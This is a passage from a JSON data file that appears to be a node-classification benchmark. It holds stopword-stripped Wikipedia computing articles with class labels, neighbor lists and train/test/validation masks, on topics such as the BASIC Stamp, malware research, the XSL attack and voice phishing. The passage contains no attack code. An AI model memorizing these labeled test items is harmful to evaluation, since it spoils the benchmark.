    "text": "BASIC_Stamp:basic stamp basic stamp microcontroller small specialized basic interpreter pbasic built rom made parallax inc. popular electronics hobbyists since early 1990s although basic stamp 2 form 24 pin dip chip fact small printed circuit board pcb contains essential elements microprocessor system end result hobbyist connect 9 v battery basic stamp complete system serial connection personal computer allows programmer download software basic stamp stored onboard non-volatile memory device remains programmed erased reprogrammed even power stamp removed power reconnected stamp immediately starts executing program slot 0 8 numbered 0..7 basic stamp programmed variant basic language called pbasic pbasic incorporates common microcontroller functions including pwm serial communications i²c 1-wire communications communications common lcd driver circuits hobby servo pulse trains pseudo-sine wave frequencies ability time rc circuit may used detect analog value program written 'stamp editor integrated development environment ide windows syntax checked tokenized sent chip serial/usb mini-b cable run currently four variants interpreter bs2 sub-variants feature memory higher execution speed additional specialized pbasic commands extra i/o pins etc. comparison original bs2 model bs1 bs2 use pic remaining basic stamp 2 variants use parallax sx processor third variant javelin stamp module uses subset sun microsystems java programming language instead parallax pbasic include networking facilities fourth variant spin stamp module based parallax propeller therefore uses spin programming language instead pbasic number companies make clones basic stamp additional features faster execution analog-to-digital converters hardware-based pwm run background parallax propeller gradually accumulating software libraries give functionality similar basic stamp however uniform list pbasic facilities spin equivalents",
    "neighbors": [
      9665,
      5635,
      5677,
      10833,
      9714,
      7445,
      2874
    ],
    "mask": "Test"
  },
  {
    "node_id": 1895,
    "label": 5,
    "text": "Megaphone_desktop_tool:megaphone desktop tool megaphone desktop tool windows action alert tool developed give israel united support giyus distributed world union jewish students world jewish congress jewish agency israel world zionist organization standwithus hasbara fellowships honestreporting pro-israel public relations organizations tool released july 2006 lebanon war june 2011 tool longer available giyus website rss newsfeed available megaphone desktop tool acted wrapper around rss feed giyus website originally gave user option going particular site poll user chooses go site software casts vote automatically technically feasible feature discontinued giyus tries save time effort locating voting form inside website seemingly simple task may prove quite confusing certain sites whenever technically direct straight voting action arrived poll results means directed straight voting action already successfully voted reason n't care vote always use thanks link article alert popup later versions voting concept removed entirely tool directed users anti-israel websites giving users option click button labeled act would direct user poll email address software license provides remote updates understand agree giyus.org may provide updates patches and/or new versions software time time including automatic updates installed computer notice needed continue use services hereby authorize installations according jerusalem post amir gissin head public affairs department foreign ministry israel expressed support tool use foreign ministry pushing idea urging supporters israel everywhere become cyberspace soldiers new battleground israel image reports computing website register described use software highly organised mass manipulation technologies supposed democratising claimed megaphone effectively high-tech exercise ballot-stuffing register also reported bbc history magazine website noticed upsurge voting whether holocaust denial criminal offence britain closing date already passed result already published votes invalid anyway stewart purvis former editor-in-chief itn noted independent panel reviewing bbc israeli-palestinian coverage received large number letters north america accused bbc anti-israeli states evidence pressure group involvement following success megaphone tool developers formed company collactive 2007 collactive released web assistant general-purpose commercial version megaphone tool tool received wide range reactions praise criticism amir gissin head public affairs department israeli foreign ministry praised tool noting efficacy adnan hajj photographs controversy obtaining admission reuters news agency photograph adnan hajj improperly edited photo editing software tool similarly praised number pro-israel organizations helping fight perceive anti-israel media bias time criticized independent television news others stuffing ballot online polls generating excessive comments 'spam internet message boards stifling online discussion seen mass participatory form propaganda june 2011 megaphone desktop tool unavailable download creators website currently alerts displayed giyus website rss feed",
    "neighbors": [],
    "mask": "Train"
  },
  {
    "node_id": 1896,
    "label": 4,
    "text": "Malware_research:malware research notion self-reproducing computer program traced back initial theories operation complex automata john von neumann showed theory program could reproduce constituted plausibility result computability theory fred cohen experimented computer viruses confirmed neumann postulate investigated properties malware detectability self-obfuscation using rudimentary encryption 1988 doctoral dissertation subject computer viruses cohen faculty advisor leonard adleman presented rigorous proof general case algorithmic determination presence virus undecidable problem must mistaken determination within broad class programs virus present problem differs require ability recognize viruses adleman proof perhaps deepest result malware computability theory date relies cantor diagonal argument well halting problem ironically later shown young yung adleman work cryptography ideal constructing virus highly resistant reverse-engineering presenting notion cryptovirus cryptovirus virus contains uses public key randomly generated symmetric cipher initialization vector iv session key sk cryptoviral extortion attack virus hybrid encrypts plaintext data victim machine using randomly generated iv sk iv+sk encrypted using virus writer public key theory victim must negotiate virus writer get iv+sk back order decrypt ciphertext assuming backups analysis virus reveals public key iv sk needed decryption private key needed recover iv sk result first show computational complexity theory used devise malware robust reverse-engineering growing area computer virus research mathematically model infection behavior worms using models lotka–volterra equations applied study biological virus various virus propagation scenarios studied researchers propagation computer virus fighting virus virus like predator codes effectiveness patching etc behavioral malware detection researched recently approaches behavioral detection based analysis system call dependencies executed binary code traced using strace precise taint analysis compute data-flow dependencies among system calls result directed graph formula_1 nodes system calls edges represent dependencies example formula_2 result returned system call formula_3 either directly result indirectly output parameters later used parameter system call formula_4 origins idea use system calls analyze software found work forrest et al christodorescu et al point malware authors easily reorder system calls without changing semantics program makes system call dependency graphs suitable malware detection compute difference malware goodware system call dependency graphs use resulting graphs detection achieving high detection rates kolbitsch et al pre-compute symbolic expressions evaluate syscall parameters observed runtime detect dependencies observing whether result obtained evaluation matches parameter values observed runtime malware detected comparing dependency graphs training test sets fredrikson et al describe approach uncovers distinguishing features malware system call dependency graphs extract significant behaviors using concept analysis leap mining babic et al recently proposed novel approach malware detection classification based grammar inference tree automata approach infers automaton dependency graphs show automaton could used detection classification malware research combining static dynamic malware analysis techniques also currently conducted effort minimize shortcomings studies researchers islam et al working integrate static dynamic techniques order better analyze classify malware malware variants",
    "neighbors": [
      7560,
      6274,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 1897,
    "label": 4,
    "text": "Cyber_risk_quantification:cyber risk quantification cyber risk quantification involves application risk quantification techniques organization cybersecurity risk cyber risk quantification process evaluating cyber risks identified validating measuring analyzing available cyber data using mathematical modeling techniques accurately represent organization cybersecurity environment manner used make informed cybersecurity infrastructure investment risk transfer decisions cyber risk quantification supporting activity cybersecurity risk management cybersecurity risk management component enterprise risk management especially important organizations enterprises highly dependent upon information technology networks systems business operations one method quantifying cyber risk value-at-risk var method discussed january 2015 world economic forum meeting see external reference meeting var studied researched deemed viable method quantifying cyber risk metric related cyber risk quantification identified cited cyber risk reduction return investment cr3oi metric uses cyber var expression return investment single series cyber investments see cyber risk reduction return investment cyber risk quantification automated software supported process lets user create model system architecture uses built mathematical modeling techniques software quantify cyber security risks",
    "neighbors": [
      4936,
      3994,
      9000,
      3447
    ],
    "mask": "None"
  },
  {
    "node_id": 1898,
    "label": 4,
    "text": "XSL_attack:xsl attack cryptography extended sparse linearization xsl attack method cryptanalysis block ciphers attack first published 2002 researchers nicolas courtois josef pieprzyk caused controversy claimed potential break advanced encryption standard aes cipher also known rijndael faster exhaustive search since aes already widely used commerce government transmission secret information finding technique shorten amount time takes retrieve secret message without key could wide implications method high work-factor unless lessened means technique reduce effort break aes comparison exhaustive search therefore affect real-world security block ciphers near future nonetheless attack caused experts express greater unease algebraic simplicity current aes overview xsl attack relies first analyzing internals cipher deriving system quadratic simultaneous equations systems equations typically large example 8,000 equations 1,600 variables 128-bit aes several methods solving systems known xsl attack specialized algorithm termed extended sparse linearization applied solve equations recover key attack notable requiring handful known plaintexts perform previous methods cryptanalysis linear differential cryptanalysis often require unrealistically large numbers known chosen plaintexts solving multivariate quadratic equations mq finite set numbers np-hard problem general case several applications cryptography xsl attack requires efficient algorithm tackling mq 1999 kipnis shamir showed particular public key algorithm known hidden field equations scheme hfe could reduced overdetermined system quadratic equations equations unknowns one technique solving systems linearization involves replacing quadratic term independent variable solving resultant linear system using algorithm gaussian elimination succeed linearization requires enough linearly independent equations approximately many number terms however cryptanalysis hfe equations kipnis shamir proposed re-linearization technique extra non-linear equations added linearization resultant system solved second application linearization re-linearization proved general enough applicable schemes 2000 courtois et al proposed improved algorithm mq known xl extended linearization increases number equations multiplying monomials certain degree complexity estimates showed xl attack would work equations derived block ciphers aes however systems equations produced special structure xsl algorithm developed refinement xl could take advantage structure xsl equations multiplied carefully selected monomials several variants proposed research efficiency xl derivative algorithms remains ongoing yang chen 2004 courtois pieprzyk 2002 observed aes rijndael partially also serpent could expressed system quadratic equations variables represent plaintext ciphertext key bits also various intermediate values within algorithm s-box aes appears especially vulnerable type analysis based algebraically simple inverse function subsequently ciphers studied see systems equations produced biryukov de cannière 2003 including camellia khazad misty1 kasumi unlike forms cryptanalysis differential linear cryptanalysis one two known plaintexts required xsl algorithm tailored solve type equation systems produced courtois pieprzyk estimate optimistic evaluation shows xsl attack might able break rijndael 256 bits serpent key lengths 192 256 bits analysis however universally accepted example aes 4 conference bonn 2004 one inventors rijndael vincent rijmen commented xsl attack attack dream promptly courtois answered xsl may dream may also bad dream turn nightmare however neither later paper actions nsa nist give support remark courtois 2003 murphy robshaw discovered alternative description aes embedding larger cipher called bes described using simple operations single field gf 2 xsl attack mounted system yields simpler set equations would break aes complexity around 2 courtois pieprzyk analysis correct 2005 cid leurent gave evidence proposed form xsl algorithm provide efficient method solving aes system equations however courtois disputed findings fse 2007 chu-wee lim khoongming khoo showed possibly work presented even xsl works modern algorithms attack currently poses little danger terms practical security like many modern cryptanalytic results would so-called certificational weakness faster brute force attack resources required still huge unlikely real-world systems could compromised using future improvements could increase practicality attack however type attack new unexpected cryptographers expressed unease algebraic simplicity ciphers like rijndael bruce schneier niels ferguson write one criticism aes n't quite trust security… concerns us aes simple algebraic structure… block cipher know simple algebraic representation idea whether leads attack knowing reason enough skeptical use aes practical cryptography 2003 pp 56–57",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      1315,
      4389,
      10662,
      169,
      11185,
      2357,
      10806,
      1847,
      9528,
      2110,
      9156,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Train"
  },
  {
    "node_id": 1899,
    "label": 4,
    "text": "Voice_phishing:voice phishing voice phishing form criminal phone fraud using social engineering telephone system gain access private personal financial information purpose financial reward sometimes referred vishing portmanteau voice phishing landline telephone services traditionally trustworthy terminated physical locations known telephone company associated bill-payer however vishing fraudsters often use modern voice ip voip features caller id spoofing automated systems ivr make difficult legal authorities monitor trace block voice phishing typically used steal credit card numbers information used identity theft schemes individuals although use automated responders war dialers preferred vishers reported cases human operators play active role scams attempt persuade victims posing employee legitimate body bank police telephone internet provider fraudster attempts obtain personal details financial information regarding credit card bank accounts e.g pin well personal information victim received information fraudster might able access empty account commit identity fraud fraudsters may also try persuade victim transfer money another bank account withdraw cash given directly another simple trick used fraudsters ask called parties hang dial bank victim hangs fraudster keeping line open remaining connected victim picks phone dial doubt calling company telephone number listed billing statements official sources recommended opposed calling numbers received messages callers dubious authenticity however sometimes hanging redialing insufficient caller hung victim might still connected fraudster spoofs dial tone phone line entice victim dial fraudster accomplice answers impersonates whomever victim trying call known 'no hang-up scam hence consumers advised use different phone dialing company number confirm bank account data sensitive information targeted fraudsters also trying obtain security credentials consumers use microsoft apple products spoofing caller id microsoft apple inc.. sweden mobile bank id phone app launched 2011 used identify user internet banking user logs bank computer bank activates phone app user enters password phone logged fraudulent people called people claimed bank officer saying security problem asked use mobile bank id app victim say password logged fraudster computer second mobile bank id app log approved transfer money nordea even approved fraudster phone able approve usage victim account 2018 app changed must photograph qr code computer screen making sure phone computer physically located room mostly eliminated type fraud",
    "neighbors": [
      1667,
      7044,
      8202,
      7949,
      914,
      5012,
      10263,
      8093,
      8224,
      11170,
      10275,
      5675,
      8747,
      7348,
      6712,
      11198,
      4163,
      3145,
      3533,
      4945,
      1495,
      3032,
      9053,
      4453,
      6762,
      1899,
      5621,
      8950
    ],
    "mask": "Test"
  },
  {
    "node_id": 1900,
    "label": 2,
    "text": "Alexandre_Julliard:alexandre julliard alexandre julliard born 1970 computer programmer best known project leader wine compatibility layer run microsoft windows programs unix-like operating systems julliard studied computer science swiss federal institute technology lausanne spent 1990s working embedded systems works full-time wine codeweavers julliard enjoys astronomy currently lives lausanne switzerland",
    "neighbors": [
      1632,
      5397,
      6797,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 1901,
    "label": 2,
    "text": "Vital_Product_Data:vital product data vital product data vpd collection configuration informational data associated particular set hardware software vpd stores information part numbers serial numbers engineering change levels devices attached system provide vpd often available pci scsi devices parallel ata usb devices also provide similar data refer vpd vpd data typically burned onto eeproms associated various hardware components queried attached i2c buses used firmware example openfirmware determine nature system hardware shield operation firmware minor changes variations hardware implementations within given machine model number ibm aix operating system vpd also refers subset database tables object data manager odm obtained either customized vpd object class platform specific areas therefore vpd odm terms sometimes referred interchangeably lscfg command used aix get vpd codice_1 linux commands codice_2 codice_3 codice_4 display hardware vital product data",
    "neighbors": [
      3323,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1902,
    "label": 2,
    "text": "NOS/VE:nos/ve nos/ve network operating system virtual environment discontinued operating system time-sharing capabilities written control data corporation 1980s virtual memory operating system employing 64-bit virtual mode cdc cyber 180 series computers nos/ve replaced earlier nos nos/be operating systems 1970s command shell interface nos/ve called system command language scl short order callable scl command programs must declare parameters permits automatic usage summaries passing parameters name position type checking parameter values standard nos/ve commands follow particular naming convention form command verb adjective noun commands could abbreviated first three characters verb followed first character words examples inspired addressing structure-members various programming languages catalog separator dot subsystems like ftp integrate command shell change prompt add commands like get_file thereby statements like flow-control stay subsystems mixed procedures scripts commands could take parameters create_connection command would connect ip address 10.1.2.3 telnet service",
    "neighbors": [
      11075,
      7364,
      3334,
      6120,
      11112,
      7983,
      11356,
      11539,
      2198,
      25,
      9946,
      7356,
      7325,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 1903,
    "label": 3,
    "text": "Reset_vector:reset vector reset vector default location central processing unit go find first instruction execute reset reset vector pointer address cpu always begin soon able execute instructions address section non-volatile memory initialized contain instructions start operation cpu first step process booting system containing cpu",
    "neighbors": [
      7234,
      7269,
      5000,
      10985,
      9964,
      1776,
      10130,
      499,
      6868,
      1399,
      5080,
      2811,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 1904,
    "label": 7,
    "text": "Microsoft_Bookings:microsoft bookings microsoft bookings scheduling tool part microsoft office family products generally released microsoft march 2017 bookings allows customers small businesses companies book appointments company application available business premium subscribers office 365 july 20 2016 microsoft launched bookings customers u.s. canada office 365 business premium license march 20 2017 microsoft globally released bookings worldwide including launching bookings android ios",
    "neighbors": [
      7523,
      2632,
      11144,
      460,
      10029,
      7983,
      9328,
      1427,
      5619,
      440,
      2046
    ],
    "mask": "None"
  },
  {
    "node_id": 1905,
    "label": 4,
    "text": "Common_Criteria_Testing_Laboratory:common criteria testing laboratory common criteria model provides separation roles evaluator certifier product certificates awarded national schemes basis evaluations carried independent testing laboratories common criteria testing laboratory third-party commercial security testing facility accredited conduct security evaluations conformance common criteria international standard facility must accredited according iso/iec 17025 national certification body list laboratory designations country common criteria recognition arrangement ccra common criteria mutual recognition arrangement mra limitations agreement past evaluations eal4+ recognized on-going transition away eal levels introduction ndpp evaluations “ map ” eal4 assurance components continue recognized united states national institute standards technology nist national voluntary laboratory accreditation program nvlap accredits cctls meet national information assurance partnership niap common criteria evaluation validation scheme requirements conduct security evaluations conformance common criteria laboratories must meet following requirements cctls enter contractual agreements sponsors conduct security evaluations products protection profiles use ccevs niap approved test methods derived common criteria common methodology technology based sources cctls must observe highest standards impartiality integrity commercial confidentiality cctls must operate within guidelines established ccevs become cctl testing laboratory must go series steps involve niap validation body nvlap nvlap accreditation primary requirement achieving cctl status scheme requirements satisfied nvlap accreditation addressed niap validation body present three scheme-specific requirements imposed validation body niap approved cctls must agree following testing laboratory becomes cctl laboratory approved niap validation body listed approved laboratories list avoid unnecessary expense delay becoming niap-approved testing laboratory strongly recommended prospective cctls ensure able satisfy scheme-specific requirements prior seeking accreditation nvlap accomplished sending letter intent niap prior entering nvlap process additional laboratory-related information found ccevs publications canada communications security establishment canada csec canadian common criteria scheme cccs oversees common criteria evaluation facilities ccef accreditation performed standards council canada scc program accreditation laboratories – canada palcan according can-p-1591 scc ’ adaptation iso/iec 17025-2005 itset laboratories approval performed ccs certification body body within csec verification applicant ability perform competent common criteria evaluations",
    "neighbors": [
      6593,
      8904,
      6604,
      5136,
      4253
    ],
    "mask": "Train"
  },
  {
    "node_id": 1906,
    "label": 4,
    "text": "Shannen_Rossmiller:shannen rossmiller shannen rossmiller born may 31 1969 american lecturer instructor cyber counter-intelligence forensics former montana municipal court judge controversial role vigilante online terrorist-hunter part 7seas group former high school cheerleader paralegal mother three rossmiller posed online militant anti-american muslim radicals attract eye similar mindsets still member 7-seas group provided evidence led arrest conviction ryan g. anderson national guardsman deploy u.s. iraq ryan serving life sentence seeking aid enemy time war attempted espionage 2005 posing online al qaeda financier rossmiller offered transient michael reynolds 40,000 purchase fuel trucks attack american pipelines reynolds arrested attempted pick money 2007 convicted jury attempting provide material support al qaeda related charges sentenced 30 years jail rossmiller appeared 2005 bbc documentary entitled new al-qaeda along internet cyber sleuths criticized work july 2007 publicist seeking book movie deal based rossmiller story 2011 published book entitled unexpected patriot",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 1907,
    "label": 4,
    "text": "Qualys:qualys qualys inc. provides cloud security compliance related services based foster city california founded 1999 qualys first company deliver vulnerability management solutions applications web using software service saas model 2013 gartner group fifth time gave qualys strong positive rating services added cloud-based compliance web application security offerings qualys 10,300 customers 130 countries including majority forbes global 100 company strategic partnerships major managed services providers consulting organizations including bt dell secureworks fujitsu ibm ntt symantec verizon wipro company also founding member cloud security alliance csa qualys founded 1999 company launched qualysguard december 2000 making qualys one first entrants vulnerability management market march 2001 angel investor philippe courtot became ceo company major investment company also serves chairman board qualysguard intranet scanner released 2002 automatically scan corporate lans vulnerabilities search available patch following year qualys released freemap web-based tool scanning mapping identifying possible security holes within networks connected internet 2005 qualys extended qualysguard product line 2008 qualys introduced qualysguard policy compliance extended platform ’ global scanning capabilities collect compliance data across organization map information policies document compliance auditing purposes qualys also released service web application scanning named qualysguard web application scanning 2010 rsa conference usa qualys announced qualysguard malware detection service new service designed scan identify malware web sites also announced qualys secure seal allows websites show visitors passed security scans july 2010 qualys announced qualys browsercheck service checking web browsers plug-ins security vulnerabilities rsa conference 2011 qualys launched new open source web application firewall project ironbee led ivan ristic creator modsecurity director engineering qualys rsa conference 2012 qualys introduced updates qualysguard cloud platform extended capabilities help customers improve security systems applications automate compliance initiatives it-grc provide online protection cyber-attacks reducing operational costs increasing efficiency security programs qualys went public nasdaq symbol qlys september 28 2012 raising net proceeds 87.5 million 2014 rsa conference qualys announced general availability qualyguard web application firewall waf provides protection websites running amazon ec2 on-premises well new continuous monitoring solution free top 4 security controls service 2015 company released 2.0 waf software included virtual patching customizable event responses year qualys also released security compliance solution called cloud agent platform august 2015 company released free asset management service qualys assetview allowed organizations keep inventory computers software february 2016 qualys released threatprotect vulnerability detection service cloud-based platform company received full certification configuration management databases cmdbs app servicenow allowing app integrated servicenow system march 2016 july 2016 announced qualys would integrate microsoft azure security center august 2017 qualys acquired network analysis assets nevis networks undisclosed sum december 2017 qualys announced acquisition netwatcher network security company april 2018 qualys acquired software assets singapore-based 1mobility startup develops security technologies mobile phones june 2018 qualys announced addition asset inventory cloud platform sc magazine awarded qualys security software solutions every year 2004-2014 sc magazine also awarded qualys best security company 2014 2010 inc. magazine ranked qualys within 5000 fastest growing private companies usa based 104 revenue growth 2006 2009 2012 silicon valley/san jose business journal recognized qualys one largest private companies silicon valley – ranking 26th list 51 november 2014 qualys received 2014 security reader choice awards best risk policy compliance solution best application security product best vulnerability 2014 2015 qualys received award best application security product sans institute 2017 frost sullivan recognizes qualys 2017 global vulnerability management market leadership award qualys honored cyber defense magazine 2017 cyber security leader",
    "neighbors": [
      5636,
      1935,
      4755,
      4388,
      9137,
      10437,
      331,
      4049,
      467,
      8787,
      7515,
      7899,
      3805,
      10718,
      9569,
      6372,
      997,
      5230,
      10745,
      3323
    ],
    "mask": "Train"
  },
  {
    "node_id": 1908,
    "label": 7,
    "text": "Filecoin:filecoin filecoin ⨎ open-source public cryptocurrency digital payment system intended blockchain-based cooperative digital storage data retrieval method made protocol labs builds top interplanetary file system allowing users rent unused hard drive space",
    "neighbors": [
      3713,
      8706,
      9859,
      4229,
      4490,
      11029,
      3350,
      10522,
      9248,
      3366,
      4280,
      3770,
      1087,
      8640,
      708,
      3792,
      8916,
      4827,
      3676,
      5085,
      11612,
      4193,
      3428,
      3813,
      7921,
      4725,
      5749,
      764
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1909,
    "label": 0,
    "text": "Microsoft_Language_Portal:microsoft language portal microsoft language portal multilingual online dictionary computing terms also offers free downloads localization style guides translations user interface text feedback feature made public 2009",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 1910,
    "label": 9,
    "text": "RichFaces:richfaces richfaces open source ajax-enabled component library javaserver faces hosted jboss allows easy integration ajax capabilities enterprise application development reached end-of-life june 2016 richfaces component library javaserver faces adds richfaces originated ajax4jsf framework alexander smirnov designed implemented autumn 2005 smirnov joined exadel continued develop framework march 2006 exadel released first version would become ajax4jsf later year exadel vcp split ajax4jsf framework richfaces born richfaces provided out-of-the-box components component-centric ajax approach components everything need ajax4jsf provided page-wide ajax support developers specify parts page server process client-side user actions parts updated processing ajax4jsf became open-source project hosted java.net richfaces became commercial jsf component library march 2007 jboss division red hat 2006 exadel signed partnership agreement whereby ajax4jsf richfaces would come jboss umbrella jboss ajax4jsf jboss richfaces richfaces would also become open-source free september 2007 jboss exadel decided merge ajax4jsf richfaces richfaces name made sense libraries free open-source one product solved many existing version- compatibility-issues version ajax4jsf would work version richfaces february 12th 2016 richfaces developer michal petrov announced end-of-life richfaces june 2016 framework implemented component library adds ajax capability existing pages developer ’ need write javascript code replace existing components new ajax widgets richfaces enables page-wide ajax support instead traditional component-wide support hence developer define event page invokes ajax request areas page synchronized jsf component tree ajax request changes data server according events fired client richfaces allows define means jsf tags different parts jsf page wish update ajax request provides options send ajax requests server also jsf page n't change regular jsf page n't need write javascript code hand controlling everything server side almost javascript needed page state maintained easily server architecture richfaces consists ajax filter ajax action components ajax containers javascript engine skinnability special feature richfaces used defining common interface styles feature based xcss technology provides flexibility dynamics richfaces provides set predefined skins skin properties generalbackgroundcolor generallinkcolor headerfamilyfont etc stored skinname.skin.properties file component xcss special file format combines flexibility xml css file performs mapping css selectors skin properties particular skin additionally richfaces provides skinning standard html controls create custom skin using plug-n-skin feature maven archetype builds skeleton new skin result presented code",
    "neighbors": [
      3462,
      1802,
      5677,
      7374,
      9455,
      10526
    ],
    "mask": "None"
  },
  {
    "node_id": 1911,
    "label": 5,
    "text": "OpenSTA:opensta opensta feature-rich gui-based web server benchmarking utility perform scripted http https heavy load tests performance measurements freely available distributable open source gnu general public license opensta currently runs microsoft windows-based operating systems scripts recorded proprietary language called scl fairly simple coding language provides support custom functions variable scopes random sequential lists opensta originally written cyrano cyrano intentions write commercial plug modules support opensta performance testing non-web applications note recent version posted opensta home page 1.4.4 released 27 oct 2007",
    "neighbors": [
      2081,
      10658,
      3462,
      10601,
      3882,
      9964,
      3565,
      6797,
      7983,
      4465,
      499,
      1461,
      2070,
      823,
      7836
    ],
    "mask": "Test"
  },
  {
    "node_id": 1912,
    "label": 4,
    "text": "Katie_Moussouris:katie moussouris katie moussouris american computer security researcher entrepreneur pioneer vulnerability disclosure best known ongoing work advocating responsible security research previously member stake created bug bounty program microsoft directly involved creating u.s. department defense first bug bounty program hackers previously served chief policy officer hackerone vulnerability disclosure company based san francisco california currently founder ceo luta security moussouris interested computers young age learned program basic commodore 64 mother bought 3rd grade first girl take ap computer science high school attended simmons college study molecular biology mathematics simultaneously worked human genome project mit whitehead institute whitehead transitioned lab assistant systems administrator role three years became systems administrator mit department aeronautics astronautics helped design computer system new lab open 2000 time also worked systems administrator harvard school engineering applied sciences moved california work linux developer turbolinux started computer security response program active within west coast hacker scene formally joined stake penetration tester 2002 invitation chris wysopal moussouris joined symantec october 2004 acquired stake founded managed symantec vulnerability research 2004 first program allow symantec researchers publish vulnerability research may 2007 moussouris left symantec join microsoft security strategist founded microsoft vulnerability research msvr program announced blackhat 2008 program coordinated response several significant vulnerabilities including dan kaminsky dns flaw also actively looked bugs third-party software affecting microsoft customers subsequent examples include google project zero september 2010 may 2014 moussouris senior security strategist lead microsoft ran security community outreach strategy team microsoft part microsoft security response center msrc team instigated microsoft bluehat prize advancement exploit mitigations awarded 260,000 prizes researchers blackhat usa 2012 grand prize 200,000 time largest cash payout offered software vendor also created microsoft first bug bounty program paid 253,000 received 18 vulnerabilities course tenure moussouris helped edit iso/iec 29147 document since around 2008 april 2016 iso made standard freely available charge request moussouris cert coordination center art manion may 2014 moussouris named chief policy officer hackerone vulnerability disclosure company based san francisco california role moussouris responsible company vulnerability disclosure philosophy worked promote legitimize security research among organizations legislators policy makers still microsoft moussouris began discussing bug bounty program federal government continued talks moved hackerone march 2016 moussouris directly involved creating department defense hack pentagon pilot program organized vetted hackerone first bug bounty program history us federal government moussouris followed pentagon program hack air force hackerone luta security partnering deliver 20 bug bounty challenges three years defense department april 2016 moussouris founded luta security consultancy help organizations governments work collaboratively hackers bug bounty programs 2015-2016 2016-2017 katie moussouris served cybersecurity fellow new america u.s. based think tank 2013 wassenaar arrangement export controls conventional arms dual-use goods technologies amended include intrusion software moussouris wrote op-ed wired criticizing move harmful vulnerability disclosure industry due overly-broad definition encouraged security experts write help regulators understand make right changes invited technical expert directly assist us wassenaar arrangement negotiations helped rewrite amendment adopt end-use decontrol exemptions based intent user moussouris visiting scholar mit sloan school management affiliate researcher harvard belfer center science international affairs conducted economic research labor market security bugs coauthored book chapter first system dynamics model vulnerability economy exploit market published mit press 2017 2018 moussouris testified front u.s. senate subcommittee consumer protection product safety insurance data security security research defensive purposes 2014 sc magazine named moussouris women security list also named one 10 women information security everyone know one watch among 2011 women influence awards 2018 featured among america top 50 women tech forbes september 2015 moussouris filed discrimination class-action lawsuit microsoft federal court seattle alleged microsoft hiring practices upheld practice sex discrimination women technical engineering roles respect performance evaluations pay promotions terms conditions employment",
    "neighbors": [
      9217,
      9569,
      1764,
      5636,
      711,
      5512,
      7337,
      6474,
      11,
      7228,
      823,
      7899,
      4956,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 1913,
    "label": 8,
    "text": "Apache_Nutch:apache nutch apache nutch highly extensible scalable open source web crawler software project nutch coded entirely java programming language data written language-independent formats highly modular architecture allowing developers create plug-ins media-type parsing data retrieval querying clustering fetcher robot web crawler written scratch specifically project nutch originated doug cutting creator lucene hadoop mike cafarella june 2003 successful 100-million-page demonstration system developed meet multi-machine processing needs crawl index tasks nutch project also implemented mapreduce facility distributed file system two facilities spun subproject called hadoop january 2005 nutch joined apache incubator graduated become subproject lucene june year since april 2010 nutch considered independent top level project apache software foundation february 2014 common crawl project adopted nutch open large-scale web crawl goal nutch project release global large-scale web search engine longer case nutch following advantages simple fetcher ibm research studied performance nutch/lucene part commercial scale cso project findings scale-out system nutch/lucene could achieve performance level cluster blades achievable scale-up computer power5 clueweb09 dataset used e.g trec gathered using nutch average speed 755.31 documents per second",
    "neighbors": [
      2566,
      10377,
      8460,
      2318,
      7567,
      1296,
      6161,
      11284,
      1047,
      8217,
      11161,
      2459,
      6555,
      8860,
      3744,
      3875,
      3877,
      10661,
      11303,
      5677,
      10541,
      1327,
      944,
      7983,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      4031,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      714,
      5066,
      8139,
      11343,
      4944,
      1363,
      7802,
      9302,
      1240,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      113,
      2163,
      6774,
      7159,
      4473,
      1018
    ],
    "mask": "Train"
  },
  {
    "node_id": 1914,
    "label": 4,
    "text": "Internet_Crime_Complaint_Center:internet crime complaint center mission internet crime complaint center also known ic3 provide public reliable convenient reporting mechanism submit information federal bureau investigation fbi concerning suspected internet-facilitated criminal activity develop alliances law enforcement industry partners information analyzed disseminated investigative intelligence purposes law enforcement public awareness since 2000 ic3 received complaints crossing spectrum cyber crime matters include online fraud many forms including intellectual property rights ipr matters computer intrusions hacking economic espionage theft trade secrets online extortion international money laundering identity theft growing list internet facilitated crimes become increasingly evident regardless label placed cyber crime matter potential overlap another referred matter substantial therefore ic3 formerly known internet fraud complaint center ifcc renamed october 2003 better reflect broad character matters internet cyber nexus referred ic3 minimize need one distinguish internet fraud potentially overlapping cyber crimes ic3 purpose serve central hub receive develop refer criminal complaints regarding rapidly expanding occurrences internet crime ic3 gives victims convenient easy-to-use reporting mechanism alerts authorities suspected criminal civil violations internet ic3 develops leads notifies law enforcement agencies federal state local international level",
    "neighbors": [
      3941,
      4945,
      1970,
      8950,
      7739,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1915,
    "label": 3,
